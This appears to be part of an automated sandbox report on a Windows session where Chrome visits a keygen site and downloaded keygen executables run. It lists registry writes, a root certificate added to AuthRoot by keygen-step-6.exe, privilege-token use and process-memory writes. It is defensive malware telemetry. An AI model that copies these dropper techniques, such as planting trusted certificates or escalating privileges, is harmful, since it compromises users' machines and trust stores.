Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34AB = 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 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "slijo0c" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}\1 = "2204" rUNdlL32.eXe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000005c75a9fb59d02949f951ecfce3980735da96a62b946ed299aaa4f5df6ca5911ec85d706fe00fabcd78b6f3437f705a7ae90d68df430c87b300dc6729b422d1ba13dc1c44679cebff942bd049f0bd3697c1346617ed91d9bd8e4 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 
01000000f5b13187e59cb5b30f585ef97eb2b62b4dffe51be9041fc20a30cf05a6fa9c87dcb6c80b2e2ef65131c40bf97749b9f1e623050ffc39c4c5808c MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe -
Processes:
keygen-step-6.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 keygen-step-6.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 59 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exesoftware_reporter_tool.exechrome.exechrome.exerUNdlL32.eXesvchost.exeWerFault.exekey.exe5801742.exejfiag3g_gg.exeAddInProcess32.exe2600165.exepid process 3764 chrome.exe 3764 chrome.exe 764 chrome.exe 764 chrome.exe 2212 chrome.exe 2212 chrome.exe 5252 chrome.exe 5252 chrome.exe 5600 chrome.exe 5600 chrome.exe 5692 chrome.exe 5692 chrome.exe 5740 chrome.exe 5740 chrome.exe 5796 chrome.exe 5796 chrome.exe 5972 chrome.exe 5972 chrome.exe 5964 software_reporter_tool.exe 5964 software_reporter_tool.exe 4952 chrome.exe 4952 chrome.exe 4952 chrome.exe 4952 chrome.exe 4436 chrome.exe 4436 chrome.exe 188 rUNdlL32.eXe 188 rUNdlL32.eXe 4264 svchost.exe 4264 svchost.exe 4264 svchost.exe 4264 svchost.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 3256 key.exe 3256 key.exe 4688 5801742.exe 4688 5801742.exe 5316 jfiag3g_gg.exe 5316 jfiag3g_gg.exe 5644 AddInProcess32.exe 1708 2600165.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
MicrosoftEdgeCP.exepid process 4624 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
software_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exetaskkill.exerUNdlL32.eXesvchost.exesvchost.exesvchost.exeWerFault.exedescription pid process Token: 33 6012 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 6012 software_reporter_tool.exe Token: 33 5964 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 5964 software_reporter_tool.exe Token: 33 6076 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 6076 software_reporter_tool.exe Token: 33 6096 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 6096 software_reporter_tool.exe Token: SeDebugPrivilege 4860 taskkill.exe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 4264 svchost.exe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeAuditPrivilege 2544 svchost.exe Token: SeAuditPrivilege 2544 svchost.exe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeAssignPrimaryTokenPrivilege 2796 svchost.exe Token: SeIncreaseQuotaPrivilege 2796 svchost.exe Token: SeSecurityPrivilege 2796 svchost.exe Token: SeTakeOwnershipPrivilege 2796 svchost.exe Token: SeLoadDriverPrivilege 2796 svchost.exe Token: SeSystemtimePrivilege 2796 svchost.exe Token: SeBackupPrivilege 2796 svchost.exe Token: SeRestorePrivilege 2796 svchost.exe Token: SeShutdownPrivilege 2796 svchost.exe Token: SeSystemEnvironmentPrivilege 2796 svchost.exe Token: SeUndockPrivilege 2796 svchost.exe Token: SeManageVolumePrivilege 2796 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2796 svchost.exe Token: SeIncreaseQuotaPrivilege 2796 svchost.exe Token: SeSecurityPrivilege 2796 svchost.exe Token: SeTakeOwnershipPrivilege 2796 svchost.exe Token: SeLoadDriverPrivilege 2796 svchost.exe Token: SeSystemtimePrivilege 2796 svchost.exe Token: SeBackupPrivilege 2796 svchost.exe Token: SeRestorePrivilege 2796 svchost.exe Token: SeShutdownPrivilege 2796 svchost.exe Token: SeSystemEnvironmentPrivilege 2796 svchost.exe Token: SeUndockPrivilege 2796 svchost.exe Token: SeManageVolumePrivilege 2796 svchost.exe Token: SeAuditPrivilege 2544 svchost.exe Token: SeAuditPrivilege 2544 svchost.exe Token: SeDebugPrivilege 4264 svchost.exe Token: SeRestorePrivilege 4516 WerFault.exe Token: SeBackupPrivilege 4516 WerFault.exe Token: SeAssignPrimaryTokenPrivilege 2796 svchost.exe Token: SeIncreaseQuotaPrivilege 2796 svchost.exe Token: SeSecurityPrivilege 2796 svchost.exe Token: SeTakeOwnershipPrivilege 2796 svchost.exe Token: SeLoadDriverPrivilege 2796 svchost.exe Token: SeSystemtimePrivilege 2796 svchost.exe Token: SeBackupPrivilege 2796 svchost.exe Token: SeRestorePrivilege 2796 svchost.exe Token: SeShutdownPrivilege 2796 svchost.exe Token: SeSystemEnvironmentPrivilege 2796 svchost.exe Token: SeUndockPrivilege 2796 svchost.exe -
Suspicious use of FindShellTrayWindow 12 IoCs
Processes:
chrome.exepid process 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
Browzar.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 356 MicrosoftEdge.exe 4624 MicrosoftEdgeCP.exe 4624 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 764 wrote to memory of 1972 764 chrome.exe chrome.exe PID 764 wrote to memory of 1972 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3764 764 chrome.exe chrome.exe PID 764 wrote to memory of 3764 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1076
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2808
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff9d0f64f50,0x7ff9d0f64f60,0x7ff9d0f64f702⤵PID:1972
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:22⤵PID:3772
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1724 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3764 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:82⤵PID:2964
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:12⤵PID:3036
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:12⤵PID:2816
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:12⤵PID:904
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:12⤵PID:4072
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:12⤵PID:900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:12⤵PID:804
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4000 /prefetch:82⤵PID:4388
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:12⤵PID:4408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵PID:4740
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6948 /prefetch:82⤵PID:4884
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7088 /prefetch:82⤵PID:4920
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7236 /prefetch:82⤵PID:4956
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7060 /prefetch:82⤵PID:4992
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7180 /prefetch:82⤵PID:5004
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:82⤵PID:5064
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7104 /prefetch:82⤵PID:5100
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7248 /prefetch:82⤵PID:5112
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6596 /prefetch:82⤵PID:4308
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings2⤵PID:4252
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x44,0x248,0x7ff7e76ca890,0x7ff7e76ca8a0,0x7ff7e76ca8b03⤵PID:4380
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7044 /prefetch:82⤵PID:2264
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6604 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2212 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6468 /prefetch:82⤵PID:4580
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7324 /prefetch:82⤵PID:4440
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6976 /prefetch:82⤵PID:4664
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6088 /prefetch:82⤵PID:1084
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7160 /prefetch:82⤵PID:4288
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6304 /prefetch:82⤵PID:4964
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5888 /prefetch:82⤵PID:5012
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:5044
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5660 /prefetch:82⤵PID:5096
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5796 /prefetch:82⤵PID:2060
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5784 /prefetch:82⤵PID:4344
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7592 /prefetch:82⤵PID:3876
-
